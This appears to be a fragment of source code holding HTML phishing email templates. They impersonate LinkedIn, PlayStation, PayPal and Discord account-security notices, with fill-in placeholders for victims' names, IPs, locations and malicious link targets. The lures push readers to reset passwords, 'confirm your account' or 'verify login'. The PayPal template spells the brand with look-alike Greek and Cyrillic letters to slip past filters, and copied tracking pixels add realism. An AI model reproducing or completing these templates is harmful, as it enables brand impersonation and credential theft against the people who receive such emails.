<td style="background-color: #f6f8fa; padding: 12px; -webkit-text-size-adjust: 100%; mso-table-rspace: 0pt; mso-table-lspace: 0pt; -ms-text-size-adjust: 100%; border-bottom: 1px solid #ECECEC;" bgcolor="#F6F8FA">
<table style="-webkit-text-size-adjust: 100%; mso-table-rspace: 0pt; width: 100% !important; mso-table-lspace: 0pt; -ms-text-size-adjust: 100%; min-width: 100% !important;" role="presentation" border="0" width="100%" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td style="-webkit-text-size-adjust: 100%; mso-table-rspace: 0pt; mso-table-lspace: 0pt; -ms-text-size-adjust: 100%;" align="left" valign="middle"><a style="cursor: pointer; color: #0073b1; -webkit-text-size-adjust: 100%; display: inline-block; text-decoration: none; -ms-text-size-adjust: 100%;" href="{}"> <img style="outline: none; -ms-interpolation-mode: bicubic; color: #ffffff; text-decoration: none;" src="https://static.licdn.com/sc/p/com.linkedin.email-assets-frontend%3Aemail-assets-frontend-static-content%2B__latest__/f/%2Femail-assets-frontend%2Fimages%2Femail%2Fphoenix%2Flogos%2Flogo_phoenix_header_blue_78x66_v1.png" alt="LinkedIn" width="40" height="34" border="0" /></a></td>
<td style="-webkit-text-size-adjust: 100%; mso-table-rspace: 0pt; mso-table-lspace: 0pt; -ms-text-size-adjust: 100%;" align="right" valign="middle" width="100%">
<table style="-webkit-text-size-adjust: 100%; mso-table-rspace: 0pt; mso-table-lspace: 0pt; -ms-text-size-adjust: 100%;" role="presentation" border="0" width="100%" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td style="padding: 0 0 0 10px; -webkit-text-size-adjust: 100%; mso-table-rspace: 0pt; mso-table-lspace: 0pt; -ms-text-size-adjust: 100%;" align="left" valign="middle">
<p style="margin: 0; font-weight: 400;"><span style="word-wrap: break-word; color: #4c4c4c; word-break: break-word; font-weight: 400; -ms-word-break: break-all; font-size: 14px; line-height: 1.429; overflow-wrap: break-word;">{}</span></p>
</td>
</tr>
</tbody>
</table>
</td>
<td style="-webkit-text-size-adjust: 100%; mso-table-rspace: 0pt; mso-table-lspace: 0pt; -ms-text-size-adjust: 100%;" width="1"> </td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td style="-webkit-text-size-adjust: 100%; mso-table-rspace: 0pt; mso-table-lspace: 0pt; -ms-text-size-adjust: 100%;">
<table style="-webkit-text-size-adjust: 100%; mso-table-rspace: 0pt; mso-table-lspace: 0pt; -ms-text-size-adjust: 100%;" role="presentation" border="0" width="100%" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td style="padding: 20px 24px 10px 24px; -webkit-text-size-adjust: 100%; mso-table-rspace: 0pt; mso-table-lspace: 0pt; -ms-text-size-adjust: 100%;">
<table style="-webkit-text-size-adjust: 100%; mso-table-rspace: 0pt; mso-table-lspace: 0pt; -ms-text-size-adjust: 100%;" role="presentation" border="0" width="100%" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td style="-webkit-text-size-adjust: 100%; mso-table-rspace: 0pt; mso-table-lspace: 0pt; -ms-text-size-adjust: 100%; padding-bottom: 20px;">
<h2 style="margin: 0; color: #262626; font-weight: bold; font-size: 20px; line-height: 1.2;">Hi {}!</h2>
</td>
</tr>
<tr>
<td style="-webkit-text-size-adjust: 100%; mso-table-rspace: 0pt; mso-table-lspace: 0pt; -ms-text-size-adjust: 100%; padding-bottom: 20px;">
<p style="margin: 0; color: #4c4c4c; font-weight: 400; font-size: 16px; line-height: 1.25;">We have recived a request about a reset on your LinkedIn-account.</p>
</td>
</tr>
<tr>
<td style="-webkit-text-size-adjust: 100%; mso-table-rspace: 0pt; mso-table-lspace: 0pt; -ms-text-size-adjust: 100%; padding-bottom: 20px;">
<h2 style="margin: 0; color: #262626; font-weight: bold; font-size: 24px; line-height: 1.167;">027620</h2>
</td>
</tr>
<tr>
<td style="-webkit-text-size-adjust: 100%; mso-table-rspace: 0pt; mso-table-lspace: 0pt; -ms-text-size-adjust: 100%; padding-bottom: 20px;">
<p style="margin: 0; color: #4c4c4c; font-weight: 400; font-size: 16px; line-height: 1.25;">Submit this code to reset your account</p>
</td>
</tr>
<tr>
<td style="-webkit-text-size-adjust: 100%; mso-table-rspace: 0pt; mso-table-lspace: 0pt; -ms-text-size-adjust: 100%; padding-bottom: 20px;">
<p style="margin: 0; color: #4c4c4c; font-weight: 400; font-size: 16px; line-height: 1.25;">Thank you for helping us keep your account safe.</p>
<p style="margin: 0; color: #4c4c4c; font-weight: 400; font-size: 16px; line-height: 1.25;">The team behind LinkedIn</p>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<table style="-webkit-text-size-adjust: 100%; mso-table-rspace: 0pt; mso-table-lspace: 0pt; -ms-text-size-adjust: 100%;" role="presentation" border="0" width="100%" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td style="background-color: #f8fafc; padding: 16px 24px; -webkit-text-size-adjust: 100%; mso-table-rspace: 0pt; mso-table-lspace: 0pt; -ms-text-size-adjust: 100%;" bgcolor="#F8FAFC">
<h2 style="margin: 0; color: #262626; font-weight: bold; font-size: 14px; line-height: 1.429; margin-bottom: 12px;">Time and area</h2>
<p style="margin: 0; color: #737373; font-weight: bold; font-size: 12px; line-height: 1.333;">Date:</p>
<p style="margin: 0; color: #737373; font-weight: 400; font-size: 12px; line-height: 1.333; margin-bottom: 12px;">{} {} 2020 {} (GMT)</p>
<p style="margin: 0; color: #737373; font-weight: bold; font-size: 12px; line-height: 1.333;">Operating System</p>
<p style="margin: 0; color: #737373; font-weight: 400; font-size: 12px; line-height: 1.333; margin-bottom: 12px;">{}</p>
<p style="margin: 0; color: #737373; font-weight: bold; font-size: 12px; line-height: 1.333;">Browser:</p>
<p style="margin: 0; color: #737373; font-weight: 400; font-size: 12px; line-height: 1.333; margin-bottom: 12px;">{}</p>
<p style="margin: 0; color: #737373; font-weight: bold; font-size: 12px; line-height: 1.333;">approximately location:</p>
<p style="margin: 0; color: #737373; font-weight: 400; font-size: 12px; line-height: 1.333; margin-bottom: 12px;">{}, {}</p>
<p style="margin: 0; color: #737373; font-weight: 400; font-size: 12px; line-height: 1.333; margin-top: 12px;"><strong>Don't you recognize this request?</strong> <a style="cursor: pointer; color: #0073b1; -webkit-text-size-adjust: 100%; display: inline-block; text-decoration: none; -ms-text-size-adjust: 100%;" href="{}">Change you password</a> Immediately.</p>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td style="-webkit-text-size-adjust: 100%; mso-table-rspace: 0pt; mso-table-lspace: 0pt; -ms-text-size-adjust: 100%;">
<table style="background-color: #edf0f3; padding: 0 24px; color: #6a6c6d; -webkit-text-size-adjust: 100%; mso-table-rspace: 0pt; mso-table-lspace: 0pt; -ms-text-size-adjust: 100%; text-align: center;" role="presentation" border="0" width="100%" cellspacing="0" cellpadding="0" align="center" bgcolor="#EDF0F3">
<tbody>
<tr>
<td style="padding: 16px 0 0 0; -webkit-text-size-adjust: 100%; mso-table-rspace: 0pt; mso-table-lspace: 0pt; -ms-text-size-adjust: 100%; text-align: center;" align="center"> </td>
</tr>
<tr>
<td style="-webkit-text-size-adjust: 100%; mso-table-rspace: 0pt; mso-table-lspace: 0pt; -ms-text-size-adjust: 100%;">
<table style="-webkit-text-size-adjust: 100%; mso-table-rspace: 0pt; mso-table-lspace: 0pt; -ms-text-size-adjust: 100%;" role="presentation" border="0" width="100%" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td style="padding: 0 0 12px 0; -webkit-text-size-adjust: 100%; mso-table-rspace: 0pt; mso-table-lspace: 0pt; -ms-text-size-adjust: 100%; text-align: center;" align="center"> </td>
</tr>
<tr>
<td style="padding: 0 0 12px 0; -webkit-text-size-adjust: 100%; mso-table-rspace: 0pt; mso-table-lspace: 0pt; -ms-text-size-adjust: 100%; text-align: center;" align="center">
<p style="margin: 0; word-wrap: break-word; color: #6a6c6d; word-break: break-word; font-weight: 400; -ms-word-break: break-all; font-size: 12px; line-height: 1.333; overflow-wrap: break-word;">This email got sent to {}. <a style="cursor: pointer; color: #6a6c6d; -webkit-text-size-adjust: 100%; text-decoration: underline; display: inline-block; -ms-text-size-adjust: 100%;" href="{}">Read more about why this is important.</a></p>
</td>
</tr>
<tr>
<td style="padding: 0 0 8px 0; -webkit-text-size-adjust: 100%; mso-table-rspace: 0pt; mso-table-lspace: 0pt; -ms-text-size-adjust: 100%; text-align: center;" align="center"><a style="cursor: pointer; color: #6a6c6d; -webkit-text-size-adjust: 100%; text-decoration: underline; display: inline-block; -ms-text-size-adjust: 100%;" href="{}"><img style="outline: none; -ms-interpolation-mode: bicubic; color: #ffffff; display: block; text-decoration: none;" src="https://static.licdn.com/sc/p/com.linkedin.email-assets-frontend%3Aemail-assets-frontend-static-content%2B__latest__/f/%2Femail-assets-frontend%2Fimages%2Femail%2Fphoenix%2Flogos%2Flogo_phoenix_footer_darkgray_197x48_v1.png" alt="LinkedIn" width="58" height="14" border="0" /></a></td>
</tr>
<tr>
<td style="padding: 0 0 12px 0; -webkit-text-size-adjust: 100%; mso-table-rspace: 0pt; mso-table-lspace: 0pt; -ms-text-size-adjust: 100%; text-align: center;" align="center">
<p style="margin: 0; color: #6a6c6d; font-weight: 400; font-size: 12px; line-height: 1.333;">© 2020 LinkedIn Ireland Unlimited Company, Wilton Plaza, Wilton Place, Dublin 2.</p>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</center></td>
</tr>
</tbody>
</table>
<p><img style="outline: none; -ms-interpolation-mode: bicubic; color: #ffffff; text-decoration: none; width: 1px; height: 1px;" role="presentation" src="http://www.linkedin.com/emimp/ip_WkdONVluY3dMV3M0ZUd0eU4yOW5MWFY0OmMyVmpkWEpwZEhsZllYUnZYMk5vWVd4c1pXNW5aVjl6Wlc1a1gzQnBiZz09Og==.gif" alt="" /></p>''',
"playstation": r'''<div style="background-color:#ffffff;margin:0;padding:0;width:100%!important;font-family:Arial,Helvetica,sans-serif" bgcolor="#FFFFFF">
<table width="100%" cellspacing="0" cellpadding="0" border="0">
<tbody>
<tr>
<td bgcolor="#ffffff">
<div align="center">
<table style="min-width:600px" width="600" cellspacing="0" cellpadding="0" border="0">
<tbody>
<tr>
<td>
<table width="100%" cellspacing="0" cellpadding="0" border="0">
<tbody>
<tr>
<td style="padding:40px 20px 0px 20px" valign="top" align="center"><img style="display:block" alt="PlayStation" src="http://image.txn-email.playstation.com/lib/fe9012747462077576/m/1/cb953c58-6a5f-48f1-9f45-47d8aa707c24.jpg" width="438" height="106" border="0"></td>
</tr>
</tbody>
</table></td>
</tr>
<tr>
<td valign="top" align="left">
<div>
<table width="100%" cellspacing="0" cellpadding="0" border="0">
<tbody>
<tr>
<td style="font-family:Helvetica,sans-serif;font-size:30px;color:#505050;padding:40px 20px 0px 20px" valign="top" align="center"> Requested Password Change </td>
</tr>
<tr>
<td style="font-family:Helvetica,sans-serif;font-size:13px;line-height:150%;color:#505050;padding:40px 20px 20px 20px" valign="top" align="left"> Hello {}! </td>
</tr>
<tr>
<td style="font-family:Helvetica,sans-serif;font-size:13px;line-height:150%;color:#505050;padding:0px 20px 20px 20px" valign="top" align="left"> Thank you for notifying us that you need to change your password </td>
</tr>
<tr>
<td style="font-family:Helvetica,sans-serif;font-size:13px;line-height:150%;color:#505050;padding:0px 20px 20px 20px" valign="top" align="left"> Update by clicking the buttom below </td>
</tr>
<tr>
<td style="font-family:Helvetica,sans-serif;font-size:13px;line-height:150%;color:#505050;padding:0px 20px 20px 20px" valign="top" align="center"> <table cellspacing="0" cellpadding="0"> <tbody><tr> <td style="border-radius:5px;display:block" width="250" valign="middle" height="40" bgcolor="#5887f5" align="center"><a target="_blank" style="color:#ffffff;font-size:16px;font-family:Helvetica,sans-serif;font-size:18px;text-decoration:none;line-height:40px;width:100%;display:inline-block" href="{}">Change Password</a></td> </tr> </tbody></table> </td>
</tr>
<tr>
<td style="font-family:Helvetica,sans-serif;font-size:13px;line-height:150%;color:#505050;padding:0px 20px 20px 20px" valign="top" align="left"> You now have 24 hours to change the password for your account. Choose a strong password so that your account can be protected. </td>
</tr>
<tr>
<td style="font-family:Helvetica,sans-serif;font-size:13px;line-height:150%;color:#505050;padding:0px 20px 20px 20px" valign="top" align="left"> Did you not request a password change? Make sure that only you can access your account and linked Sony accounts. </td>
</tr>
<tr>
<td style="font-family:Helvetica,sans-serif;font-size:13px;line-height:150%;color:#505050;padding:0px 20px 20px 20px" valign="top" align="left"> Have you received this message more than once? Update the email address associated with your account <a target="_blank" href="{}">Here</a>. </td>
</tr>
<tr>
<td style="font-family:Helvetica,sans-serif;font-size:13px;line-height:150%;color:#505050;padding:0px 20px 20px 20px" valign="top" align="left"> Protect your account - read our tips and guides: </td>
</tr>
<tr>
<td style="font-family:Helvetica,sans-serif;font-size:13px;line-height:150%;color:#505050;padding:0px 20px 20px 20px" valign="top" align="left"> <ul><li><a target="_blank" href="{}">How to keep your account safe and secure</a></li> <li><a target="_blank" href="{}">Enable 2-step verification in your account</a></li> <li><a target="_blank" href="{}">Add a security question and mobile number to your account</a></li></ul> </td>
</tr>
<tr>
<td style="font-family:Helvetica,sans-serif;font-size:13px;line-height:150%;color:#505050;padding:0px 20px 20px 20px" valign="top" align="center"> <table cellspacing="0" cellpadding="0"> <tbody><tr> <td style="border-radius:5px;display:block" width="250" valign="middle" height="40" bgcolor="#5887f5" align="center"><a target="_blank" style="color:#ffffff;font-size:16px;font-family:Helvetica,sans-serif;font-size:18px;text-decoration:none;line-height:40px;width:100%;display:inline-block" href="{}">Protect my account </a></td> </tr> </tbody></table> </td>
</tr>
<tr>
<td style="font-family:Helvetica,sans-serif;font-size:13px;line-height:150%;color:#505050;padding:0px 20px 20px 20px" valign="top" align="left"> Best Regards </td>
</tr>
<tr>
<td style="font-family:Helvetica,sans-serif;font-size:13px;line-height:150%;color:#505050;padding:0px 20px 20px 20px" valign="top" align="left"> The PlayStation-team </td>
</tr>
<tr>
<td valign="top" align="left">
<table width="100%" cellspacing="0" cellpadding="0" border="0">
<tbody>
<tr>
<td style="border:none;border-bottom:1px solid #d2d2d2;font-size:1px;line-height:1px" height="1" bgcolor="#ffffff"> </td>
</tr>
</tbody>
</table> </td>
</tr>
</tbody>
</table>
</div>
</td>
</tr>
<tr>
<td valign="top" align="left">
<div>
<table width="100%" cellspacing="0" cellpadding="0" border="0">
<tbody>
<tr>
<td style="font-family:Helvetica,sans-serif;font-size:13px;line-height:150%;color:#505050;padding:20px 20px 40px 20px" valign="top" align="left"> <a target="_blank" style="font-family:Helvetica,sans-serif;font-size:13px;line-height:150%;color:#006db4" href="{}">https://id.sonyentertainmentnetwork.com/id/management/#/p/communication?entry=security</a><br><br> If you want more information about our terms and conditions or read frequently asked questions and answers, you can visit the following places: <br> <br> Terms of service and User agreement:<br>
<a target="_blank" style="font-family:Helvetica,sans-serif;font-size:13px;line-height:150%;color:#006db4" href="{}">https://www.playstation.com/legal/PSNTerms/</a> <br><br> frequently asked questions and answers:<br> <a target="_blank" style="font-family:Helvetica,sans-serif;font-size:13px;line-height:150%;color:#006db4" href="{}">https://www.playstation.com/get-help/contact-us/</a><br> <br> Sekretesspolicy:<br>
<a target="_blank" style="font-family:Helvetica,sans-serif;font-size:13px;line-height:150%;color:#006db4" href="{}">https://www.playstation.com/legal/PSNTerms/</a>
<br> This email was sent on behalf of Sony Interactive Entertainment Network Europe Limited, a United Kingdom registered company number 06020283, located at 10 Great Marlborough Street, London, W1F 7LP. It is not possible to send a reply to the sender address for this email. If you have any questions, please contact customer service according to contact information at<a target="_blank" style="font-family:Helvetica,sans-serif;font-size:13px;line-height:150%;color:#006db4" href="{}">http://eu.playstation.com/support</a>. <br> <br>
<img style="display:inline-block" alt="Playstation" src="http://image.txn-email.playstation.com/lib/fe9012747462077576/m/1/2bae4234-eed9-42ea-a528-e5563819390a.png" width="20" height="15"> and "PlayStation" are registered trademarks of Sony Interactive Entertainment Inc. © 2021 Sony Interactive Entertainment LLC. <br> <br> </td>
</tr>
</tbody>
</table>
</div>
</td>
</tr>
</tbody>
</table>
</div></td>
</tr>
</tbody>
</table>
<img src="http://click.txn-email.playstation.com/open.aspx?ffcb10-fec2177376610274-fe271173726c027c741174-fe9012747462077576-ff951579-fe1e1172726d007f761c79-febc1c75706d0079&d=60121" width="1" height="1"><u></u>
</div>
</div></div>''',
"paypal": r'''<html><head>
<title></title>
</head>
<body>
<div class="adL">
<table align="center" bgcolor="#f9f9f9" border="0" cellpadding="0" cellspacing="0" class="m_8991478119753596533ecxinnermain" style="table-layout: fixed;" width="440">
<tbody>
<tr>
<td colspan="4">
<table bgcolor="#ffffff" border="0" cellpadding="0" cellspacing="0" style="border-style: solid; border-color: rgb(239, 239, 239);" width="100%">
<tbody>
<tr style="color: rgb(102, 102, 102); line-height: 20px; font-family: Arial, Helvetica, sans-serif; font-size: 14px;">
<td align="center" class="m_8991478119753596533ecxcontent" colspan="2" style="padding-right: 40px; padding-left: 40px;" valign="top">
<table bgcolor="#ffffff" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td align="left">
<p><h1 class="size-34" lang="x-size-34" style="Margin-top: 0;Margin-bottom: 0;font-style: normal;font-weight: normal;color: #3e4751;font-size: 30px;line-height: 38px;font-family: Century Gothic, sans-serif;text-align: left;"><span class="font-lato" style="line-height: inherit;"><span style="color: #024087;font-style: italic;font-weight: bold;line-height: inherit;">Ρаy</span><span style="color: #167cf0;font-style: italic;font-weight: bold;line-height: inherit;">Ρаl</span></span></h1></p>
<p><span style="color: rgb(72, 84, 93); line-height: 24px;">An unknown device trying to access to your account : </span></p>
</td>
</tr>
<tr>
<td height="20"> </td>
</tr>
<tr>
<td align="left" style="color: rgb(72, 84, 93); line-height: 24px; font-weight: bold;">
<ul style="list-style: none; padding-left: 0px;">
<li>Location : {}</li>
<li>IP adress : {}</li>
<li>Navigator : Chrome (Windows)</li>
</ul>
</td>
</tr>
<tr>
<td height="20"> </td>
</tr>
<tr>
<td align="left">
<p style="color: rgb(72, 84, 93); line-height: 24px;">Please confirm your information for security measures : </p>
</td>
</tr>
<tr>
<td align="center">
<table height="40" cellpadding="2" cellspacing="2" style="text-align: left; width: 100%;position:relative;top:10px;">
<tbody>
<tr>
<td class="button_style" id="button_text" align="center" valign="middle" style="font-family:Helvetica,Arial,sans-serif; font-weight:bold; font-stretch:normal; text-align:center; color:#ffffff; font-size:13px;background:#009CDE; border-radius:7px !important; -webkit-border-radius: 7px !important; -moz-border-radius: 7px !important; -o-border-radius: 7px !important; -ms-border-radius: 7px !important;"><a href="{}" style="color:#ffffff; text-decoration:none; display:block; font-weight:bold;" class=""><span style="color:#ffffff; text-decoration:none; display:block; font-family:Helvetica,Arial,sans-serif; font-weight:bold; font-size:13px; line-height:15px;">Confirm your account</span></a></td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td height="20"> </td>
</tr>
<tr>
<td align="center"> </td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</div>
</body></html>''',
"discord": r'''<div style="background:#f9f9f9">
<div style="background-color:#f9f9f9">
<div style="margin:0px auto;max-width:640px;background:transparent"><table style="font-size:0px;width:100%;background:transparent" cellspacing="0" cellpadding="0" border="0" align="center"><tbody><tr><td style="text-align:center;vertical-align:top;direction:ltr;font-size:0px;padding:40px 0px"><div style="vertical-align:top;display:inline-block;direction:ltr;font-size:13px;text-align:left;width:100%"><table width="100%" cellspacing="0" cellpadding="0" border="0"><tbody><tr><td style="word-break:break-word;font-size:0px;padding:0px" align="center"><table style="border-collapse:collapse;border-spacing:0px" cellspacing="0" cellpadding="0" border="0" align="center"><tbody><tr><td style="width:138px"><a target="_blank" href="{}"><img src="https://cdn.discordapp.com/email_assets/2ec94ed90b8e95d764f2a1c96f33139e.png" title alt width="138" height="38px"></a></td></tr></tbody></table></td></tr></tbody></table></div></td></tr></tbody></table></div>
<div style="max-width:640px;margin:0 auto;border-radius:4px;overflow:hidden"><div style="margin:0px auto;max-width:640px;background:#ffffff"><table style="font-size:0px;width:100%;background:#ffffff" cellspacing="0" cellpadding="0" border="0" align="center"><tbody><tr><td style="text-align:center;vertical-align:top;direction:ltr;font-size:0px;padding:40px 50px"><div style="vertical-align:top;display:inline-block;direction:ltr;font-size:13px;text-align:left;width:100%"><table width="100%" cellspacing="0" cellpadding="0" border="0"><tbody><tr><td style="word-break:break-word;font-size:0px;padding:0px" align="left"><div style="color:#737f8d;font-family:Whitney,Helvetica Neue,Helvetica,Arial,Lucida Grande,sans-serif;font-size:16px;line-height:24px;text-align:left">
<h2 style="font-family:Whitney,Helvetica Neue,Helvetica,Arial,Lucida Grande,sans-serif;font-weight:500;font-size:20px;color:#4f545c;letter-spacing:0.27px">Hello {},</h2>
<p>Looks like someone tried to sign in to your Discord account from a new location. If it was you, you authorize the login from this site via the link below. If it wasn't you, we recommend that you change your password as soon as possible.</p>
<p><b>IP-adress:</b> {}<br>
<b>place:</b> {} {}</p>
<p>P.S. We strongly recommend that you enable 2-factor authentication (2FA) for your account. Read more at: <a target="_blank" style="font-family:Whitney,Helvetica Neue,Helvetica,Arial,Lucida Grande,sans-serif;color:#7289da" href="{}">https://blog.discordapp.com/keeping-discord-safe-and-sound/</a></p>
</div></td></tr><tr><td style="word-break:break-word;font-size:0px;padding:10px 25px;padding-top:20px" align="center"><table style="border-collapse:separate" cellspacing="0" cellpadding="0" border="0" align="center"><tbody><tr><td style="border:none;border-radius:3px;color:white;padding:15px 19px" valign="middle" bgcolor="#7289DA" align="center"><a target="_blank" style="text-decoration:none;line-height:100%;background:#7289da;color:white;font-family:Ubuntu,Helvetica,Arial,sans-serif;font-size:15px;font-weight:normal;text-transform:none;margin:0px" href="{}">
Verify Login
</a></td></tr></tbody></table></td></tr><tr><td style="word-break:break-word;font-size:0px;padding:30px 0px"><p style="font-size:1px;margin:0px auto;border-top:1px solid #dcddde;width:100%"></p></td></tr><tr><td style="word-break:break-word;font-size:0px;padding:0px" align="left"><div style="color:#747f8d;font-family:Whitney,Helvetica Neue,Helvetica,Arial,Lucida Grande,sans-serif;font-size:13px;line-height:16px;text-align:left">
<p>Do you need help? <a target="_blank" style="font-family:Whitney,Helvetica Neue,Helvetica,Arial,Lucida Grande,sans-serif;color:#7289da" href="{}">Contact our support</a> or write too us on twitter <a target="_blank" style="font-family:Whitney,Helvetica Neue,Helvetica,Arial,Lucida Grande,sans-serif;color:#7289da" href="{}">@discordapp</a>.<br>
Leave your <a target="_blank" style="font-family:Whitney,Helvetica Neue,Helvetica,Arial,Lucida Grande,sans-serif;color:#7289da" href="{}">feedback here</a>.</p>
</div></td></tr></tbody></table></div></td></tr></tbody></table></div>
</div><div style="margin:0px auto;max-width:640px;background:transparent"><table style="font-size:0px;width:100%;background:transparent" cellspacing="0" cellpadding="0" border="0" align="center"><tbody><tr><td style="text-align:center;vertical-align:top;direction:ltr;font-size:0px;padding:0px"><div style="vertical-align:top;display:inline-block;direction:ltr;font-size:13px;text-align:left;width:100%"><table width="100%" cellspacing="0" cellpadding="0" border="0"><tbody><tr><td style="word-break:break-word;font-size:0px"><div style="font-size:1px;line-height:12px"> </div></td></tr></tbody></table></div></td></tr></tbody></table></div>
<div style="margin:0 auto;max-width:640px;background:#ffffff;border-radius:4px;overflow:hidden"><table style="font-size:0px;width:100%;background:#ffffff" cellspacing="0" cellpadding="0" border="0" align="center"><tbody><tr><td style="text-align:center;vertical-align:top;font-size:0px;padding:0px"><div style="vertical-align:top;display:inline-block;direction:ltr;font-size:13px;text-align:left;width:100%"><table width="100%" cellspacing="0" cellpadding="0" border="0"><tbody><tr><td style="word-break:break-word;font-size:0px;padding:30px 40px 0px 40px" align="center"><div style="color:#43b581;font-family:Whitney,Helvetica Neue,Helvetica,Arial,Lucida Grande,sans-serif;font-size:18px;font-weight:bold;line-height:16px;text-align:center">KURIOSA #12</div></td></tr><tr><td style="word-break:break-word;font-size:0px;padding:14px 40px 30px 40px" align="center"><div style="color:#737f8d;font-family:Whitney,Helvetica Neue,Helvetica,Arial,Lucida Grande,sans-serif;font-size:16px;line-height:22px;text-align:center">
In the original Fallout, a player with less than 4 in intelligence can only communicate with grunts and other noises.
</div></td></tr></tbody></table></div></td></tr></tbody></table></div>